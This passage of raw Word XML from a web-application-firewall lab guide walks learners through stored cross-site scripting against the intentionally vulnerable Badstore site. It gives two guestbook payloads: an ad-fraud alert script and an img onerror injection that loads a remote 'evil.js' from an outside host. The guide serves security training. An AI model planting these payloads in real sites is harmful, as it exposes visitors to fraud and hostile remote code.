        <w:t xml:space="preserve"> is never seen by the web server.</w:t>
      </w:r>
      <w:r w:rsidRPr="3DB4835F" w:rsidR="60B340DA">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve">  As noted earlier, Cross-Site Scripting </w:t>
      </w:r>
      <w:r w:rsidRPr="3DB4835F" w:rsidR="61040706">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t>D</w:t>
      </w:r>
      <w:r w:rsidRPr="3DB4835F" w:rsidR="60B340DA">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t>efense is enabled by default on WAFaaS</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B35D5D" w:rsidP="50C40F79" w:rsidRDefault="000E572F" w14:paraId="5FC2A8F1" w14:textId="17DCBC01">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:ind w:left="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="000E572F" w:rsidP="001E79D3" w:rsidRDefault="00B35D5D" w14:paraId="61C9F7A9" w14:textId="169C3A40">
      <w:pPr/>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w:rsidR="000E572F" w:rsidP="50C40F79" w:rsidRDefault="00B35D5D" w14:paraId="1587C0D8" w14:textId="50AFC41B">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidR="03240913">
        <w:rPr/>
        <w:t xml:space="preserve">Finding a Cross-Site Scripting vulnerability </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000E572F" w:rsidP="50C40F79" w:rsidRDefault="00B35D5D" w14:paraId="220D727B" w14:textId="0D8B0883">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
      </w:pPr>
      <w:r w:rsidR="24B6582C">
        <w:rPr/>
        <w:t>Now we will go directly to our web server and repeat the same XSS attacks to verify t</w:t>
      </w:r>
      <w:r w:rsidR="765B9493">
        <w:rPr/>
        <w:t xml:space="preserve">he vulnerability </w:t>
      </w:r>
      <w:r w:rsidR="24B6582C">
        <w:rPr/>
        <w:t>exist</w:t>
      </w:r>
      <w:r w:rsidR="0D79134D">
        <w:rPr/>
        <w:t>s</w:t>
      </w:r>
      <w:r w:rsidR="24B6582C">
        <w:rPr/>
        <w:t xml:space="preserve">.  </w:t>
      </w:r>
      <w:r w:rsidR="7DB38AEE">
        <w:rPr/>
        <w:t xml:space="preserve"> Because we are going directly to our web server, WAFaaS will not see the attacks and cannot block them</w:t>
      </w:r>
      <w:r w:rsidR="5B3426F5">
        <w:rPr/>
        <w:t>, and the attacks will succeed.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000E572F" w:rsidP="3DB4835F" w:rsidRDefault="00B35D5D" w14:paraId="01F8BF23" w14:textId="6FE4DAA7">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="36"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri" w:asciiTheme="minorAscii" w:hAnsiTheme="minorAscii" w:eastAsiaTheme="minorAscii" w:cstheme="minorAscii"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidR="03240913">
        <w:rPr/>
        <w:t xml:space="preserve">In your web browser, go to &lt;your </w:t>
      </w:r>
      <w:r w:rsidR="03240913">
        <w:rPr/>
        <w:t>Badstore</w:t>
      </w:r>
      <w:r w:rsidR="03240913">
        <w:rPr/>
        <w:t xml:space="preserve"> DNS name&gt;</w:t>
      </w:r>
      <w:r w:rsidRPr="3DB4835F" w:rsidR="03240913">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000E572F" w:rsidP="50C40F79" w:rsidRDefault="00B35D5D" w14:paraId="3633FD01" w14:textId="2BD7D63F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="36"/>
        </w:numPr>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="3DB4835F" w:rsidR="00B35D5D">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve">Click on Sign </w:t>
      </w:r>
      <w:r w:rsidRPr="3DB4835F" w:rsidR="00B35D5D">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t>Guestbook, and</w:t>
      </w:r>
      <w:r w:rsidRPr="3DB4835F" w:rsidR="00B35D5D">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="3DB4835F" w:rsidR="64381C61">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t>enter this for the comment</w:t>
      </w:r>
      <w:r w:rsidRPr="3DB4835F" w:rsidR="7749D716">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t>, being careful to use single quotes as shown.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="7749D716" w:rsidP="50C40F79" w:rsidRDefault="7749D716" w14:paraId="3BC7061D" w14:textId="5547939F">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:eastAsia="Calibri" w:cs="Courier New"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="50C40F79" w:rsidR="7749D716">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:eastAsia="Calibri" w:cs="Courier New"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
        </w:rPr>
        <w:t>&lt;script&gt;</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="50C40F79" w:rsidR="7749D716">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:eastAsia="Calibri" w:cs="Courier New"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
        </w:rPr>
        <w:t>alert(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="50C40F79" w:rsidR="7749D716">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:eastAsia="Calibri" w:cs="Courier New"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
        </w:rPr>
        <w:t>'go to terriblestore.com for lower prices!</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="50C40F79" w:rsidR="7749D716">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:eastAsia="Calibri" w:cs="Courier New"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
        </w:rPr>
        <w:t>');&lt;</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="50C40F79" w:rsidR="7749D716">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:eastAsia="Calibri" w:cs="Courier New"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
        </w:rPr>
        <w:t>/script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="7749D716" w:rsidP="50C40F79" w:rsidRDefault="7749D716" w14:paraId="402D3AF9" w14:textId="769E53D2">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="45"/>
        </w:numPr>
        <w:bidi w:val="0"/>
        <w:spacing w:before="0" w:beforeAutospacing="off" w:after="20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7749D716">
        <w:rPr/>
        <w:t>You will see a pop-up with the “MalVertizing” for the attackers site, luring your customers away to the other site.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001E79D3" w:rsidP="001E79D3" w:rsidRDefault="008E239E" w14:paraId="31A3732F" w14:textId="50285439">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:eastAsia="Calibri" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidR="008E239E">
        <w:drawing>
          <wp:inline wp14:editId="3C38611E" wp14:anchorId="5FA456EE">
            <wp:extent cx="4997452" cy="798204"/>
            <wp:effectExtent l="0" t="0" r="0" b="1905"/>
            <wp:docPr id="7" name="Picture 7" title=""/>
            <wp:cNvGraphicFramePr>
              <a:graphicFrameLocks noChangeAspect="1"/>
            </wp:cNvGraphicFramePr>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="Picture 7"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="Rda679b199975481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97452" cy="798204"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="008E239E" w:rsidP="3DB4835F" w:rsidRDefault="007708D2" w14:paraId="3D44E8F0" w14:textId="665485D6">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="46"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri" w:asciiTheme="minorAscii" w:hAnsiTheme="minorAscii" w:eastAsiaTheme="minorAscii" w:cstheme="minorAscii"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="3DB4835F" w:rsidR="007708D2">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t>Whil</w:t>
      </w:r>
      <w:r w:rsidRPr="3DB4835F" w:rsidR="041703DF">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve">e </w:t>
      </w:r>
      <w:r w:rsidRPr="3DB4835F" w:rsidR="5F399BD7">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t>simple</w:t>
      </w:r>
      <w:r w:rsidRPr="3DB4835F" w:rsidR="041703DF">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve">, this </w:t>
      </w:r>
      <w:r w:rsidRPr="3DB4835F" w:rsidR="00B837DE">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t>type of stored XSS</w:t>
      </w:r>
      <w:r w:rsidRPr="3DB4835F" w:rsidR="31252619">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve"> that can be thought of as an </w:t>
      </w:r>
      <w:r w:rsidRPr="3DB4835F" w:rsidR="00B837DE">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve">advertising fraud type attack </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008E239E" w:rsidP="3DB4835F" w:rsidRDefault="007708D2" w14:paraId="2EEAD71C" w14:textId="44286404">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="46"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri" w:asciiTheme="minorAscii" w:hAnsiTheme="minorAscii" w:eastAsiaTheme="minorAscii" w:cstheme="minorAscii"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="3DB4835F" w:rsidR="7E865162">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t>E</w:t>
      </w:r>
      <w:r w:rsidRPr="3DB4835F" w:rsidR="008E239E">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t>veryone who leaves a comment is going to see th</w:t>
      </w:r>
      <w:r w:rsidRPr="3DB4835F" w:rsidR="3D7734D8">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t>is popup.  To prove this, i</w:t>
      </w:r>
      <w:r w:rsidRPr="3DB4835F" w:rsidR="57207BD1">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t>n your web bro</w:t>
      </w:r>
      <w:r w:rsidRPr="3DB4835F" w:rsidR="3B6E18E5">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t>w</w:t>
      </w:r>
      <w:r w:rsidRPr="3DB4835F" w:rsidR="57207BD1">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve">ser, hit the back button, then try </w:t>
      </w:r>
      <w:r w:rsidRPr="3DB4835F" w:rsidR="008E239E">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t>leaving another comment</w:t>
      </w:r>
      <w:r w:rsidRPr="3DB4835F" w:rsidR="29800F18">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidRPr="3DB4835F" w:rsidR="1E126F60">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve">You will see the same </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="3DB4835F" w:rsidR="00A34C4A">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t>Terriblestore</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="3DB4835F" w:rsidR="00A34C4A">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve"> advertising pop-up again</w:t>
      </w:r>
      <w:r w:rsidRPr="3DB4835F" w:rsidR="00BC3D2F">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve">, because </w:t>
      </w:r>
      <w:r w:rsidRPr="3DB4835F" w:rsidR="0B634229">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t>of</w:t>
      </w:r>
      <w:r w:rsidRPr="3DB4835F" w:rsidR="00BC3D2F">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="3DB4835F" w:rsidR="0B634229">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve">the </w:t>
      </w:r>
      <w:r w:rsidRPr="3DB4835F" w:rsidR="00BC3D2F">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve">stored </w:t>
      </w:r>
      <w:r w:rsidRPr="3DB4835F" w:rsidR="00BC3D2F">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve">XSS </w:t>
      </w:r>
      <w:r w:rsidRPr="3DB4835F" w:rsidR="0EBE953E">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t>persisting in the comments</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w:rsidR="007045EA" w:rsidRDefault="007045EA" w14:paraId="64904668" w14:textId="77777777">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C17254" w:rsidP="50C40F79" w:rsidRDefault="007045EA" w14:paraId="7B3E78DB" w14:textId="7A8A9716">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="47"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:eastAsia="Symbol" w:cs="Symbol" w:asciiTheme="minorAscii" w:hAnsiTheme="minorAscii" w:eastAsiaTheme="minorAscii" w:cstheme="minorAscii"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="50C40F79" w:rsidR="4005B373">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t>Now to do a more advanced XSS attack.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C17254" w:rsidP="50C40F79" w:rsidRDefault="007045EA" w14:paraId="2F4C4138" w14:textId="39C15BEA">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="47"/>
        </w:numPr>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="50C40F79" w:rsidR="4005B373">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve">Go back in your browser, and </w:t>
      </w:r>
      <w:r w:rsidRPr="50C40F79" w:rsidR="007045EA">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t>C</w:t>
      </w:r>
      <w:r w:rsidRPr="50C40F79" w:rsidR="0044252F">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve">lick on Sign Guestbook </w:t>
      </w:r>
      <w:r w:rsidRPr="50C40F79" w:rsidR="40366BE6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t>again</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C17254" w:rsidP="50C40F79" w:rsidRDefault="007045EA" w14:paraId="692A44B5" w14:textId="45C68363">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="47"/>
        </w:numPr>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="50C40F79" w:rsidR="40366BE6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve">Enter your name and email </w:t>
      </w:r>
      <w:r w:rsidRPr="50C40F79" w:rsidR="00061193">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t>as before, but this time put th</w:t>
      </w:r>
      <w:r w:rsidRPr="50C40F79" w:rsidR="00866220">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t>e following</w:t>
      </w:r>
      <w:r w:rsidRPr="50C40F79" w:rsidR="00061193">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve"> as the comment text</w:t>
      </w:r>
      <w:r w:rsidRPr="50C40F79" w:rsidR="009479C9">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve">.  Use </w:t>
      </w:r>
      <w:r w:rsidRPr="50C40F79" w:rsidR="00C17254">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t>copy and paste</w:t>
      </w:r>
      <w:r w:rsidRPr="50C40F79" w:rsidR="00B02C63">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve"> for this one</w:t>
      </w:r>
      <w:r w:rsidRPr="50C40F79" w:rsidR="00C17254">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve">, just remember to fix up any quotes </w:t>
      </w:r>
      <w:r w:rsidRPr="50C40F79" w:rsidR="7A7D3619">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t>as need</w:t>
      </w:r>
      <w:r w:rsidRPr="50C40F79" w:rsidR="00C17254">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t>ed</w:t>
      </w:r>
      <w:r w:rsidRPr="50C40F79" w:rsidR="00866220">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidRPr="009C7DBD" w:rsidR="00061193" w:rsidP="00061193" w:rsidRDefault="00061193" w14:paraId="54BED81B" w14:textId="7ECBBD4E">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:eastAsia="Calibri" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1D1C1D"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="50C40F79" w:rsidR="00061193">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:eastAsia="Calibri" w:cs="Courier New"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:color w:val="1D1C1D"/>
        </w:rPr>
        <w:t>&lt;img src=1 onerror="s=document.createElement('script');s.src='</w:t>
      </w:r>
      <w:hyperlink r:id="Rde27b4e763c549f4">
        <w:r w:rsidRPr="50C40F79" w:rsidR="00061193">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:eastAsia="Calibri" w:cs="Courier New"/>
            <w:b w:val="1"/>
            <w:bCs w:val="1"/>
          </w:rPr>
          <w:t>//xss-doc.appspot.com/static/evil.js';document.body.appendChild(s)</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="50C40F79" w:rsidR="00061193">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:eastAsia="Calibri" w:cs="Courier New"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:color w:val="1D1C1D"/>
        </w:rPr>
        <w:t>;"</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007045EA" w:rsidP="001E79D3" w:rsidRDefault="007045EA" w14:paraId="6326A90E" w14:textId="30587DE5">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="50C40F79" w:rsidR="005F3A21">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve">You should get a </w:t>
      </w:r>
      <w:r w:rsidRPr="50C40F79" w:rsidR="01F885BA">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve">very eye-catching </w:t>
      </w:r>
      <w:r w:rsidRPr="50C40F79" w:rsidR="009479C9">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t>result</w:t>
      </w:r>
      <w:r w:rsidRPr="50C40F79" w:rsidR="14550C1C">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve"> demonstrating another type of attack.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004A3C9E" w:rsidP="001E79D3" w:rsidRDefault="0044252F" w14:paraId="5F1F6E04" w14:textId="3D8A22E2">
      <w:pPr/>
      <w:r w:rsidR="0044252F">
        <w:drawing>
          <wp:inline wp14:editId="5A975615" wp14:anchorId="0D5C0E28">
            <wp:extent cx="3650914" cy="2133600"/>
            <wp:effectExtent l="0" t="0" r="6985" b="0"/>
            <wp:docPr id="9" name="Picture 9" title=""/>
            <wp:cNvGraphicFramePr>
              <a:graphicFrameLocks noChangeAspect="1"/>
            </wp:cNvGraphicFramePr>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="Picture 9"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="R2d0d4ef6c34b4b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0914" cy="2133600"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
